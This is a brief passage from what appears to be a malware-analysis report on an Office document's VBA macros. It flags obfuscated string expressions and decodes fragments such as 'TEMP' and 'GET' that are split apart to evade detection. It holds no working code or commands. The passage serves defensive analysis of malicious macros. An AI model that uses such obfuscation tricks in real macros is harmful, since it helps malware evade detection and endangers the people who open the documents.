944. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
945. |            | Strings              | may be used to obfuscate strings        |
946. |            |                      | (option --decode to see all)            |
947. | VBA string |                      | Chr$(10) & Chr$(13) & " "               |
948. |            |
949.                     |                                         |
950. | VBA string | TEMP                 | ("TE" + "" + "MP")                      |
951. | VBA string | GET                  | "G" + "ET"                              |
952. +------------+----------------------+-----------------------------------------+